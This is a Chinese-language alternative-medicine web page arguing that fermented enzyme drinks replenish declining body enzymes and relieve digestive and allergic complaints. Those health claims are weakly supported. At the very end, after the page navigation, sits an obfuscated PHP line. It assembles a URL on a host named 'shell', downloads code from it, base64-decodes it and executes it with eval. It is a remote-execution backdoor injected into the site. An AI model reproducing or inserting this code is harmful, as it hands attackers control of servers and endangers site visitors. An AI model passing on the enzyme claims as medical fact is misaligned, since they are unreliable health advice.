收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 酵素好東西卻受爭議
酵素好東西卻受爭議 列印 E-mail
        接著我們再談談頗受爭議的──酵素。酵素又稱為「酶」,我們從國中的課堂上就開始被教導:口腔有澱粉酶、胃有蛋白質酶等等,事實上,每一種動植物、每一個細胞都有酶,它扮演著維持細胞新陳代謝的催化作用。

但隨著年齡漸長、身體老化、環境污染、飲食習慣不佳、生活作息不正常、濫用藥物等內外在因素,體內的酵素活性會日趨下降,進而影響到我們的健康。

        由於酵素的不耐高溫性,使得食物中的酵素在經過消毒、烘焙、煎煮、燒烤之後破壞殆盡。因此在日本,他們採用許多青菜、水果,加入濃厚的糖漿使之發酵,成為風味酸甜的健康食品,可每日攝取、補充身體所需的酵素量,維持身體正常的分解、合成、再生、輸送功能;進而改善某些系統性的疾病,如消化系統的消化不良、便秘、脹氣,或是免疫系統的過敏性疾病等等。

但在台灣,酵素卻替不肖商人背負了胡吹亂說的原罪,事實上我們應該有足夠的智慧瞭解──「任何一種學問都有它的優點和缺點」,而不是一昩地誇大它的療效。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));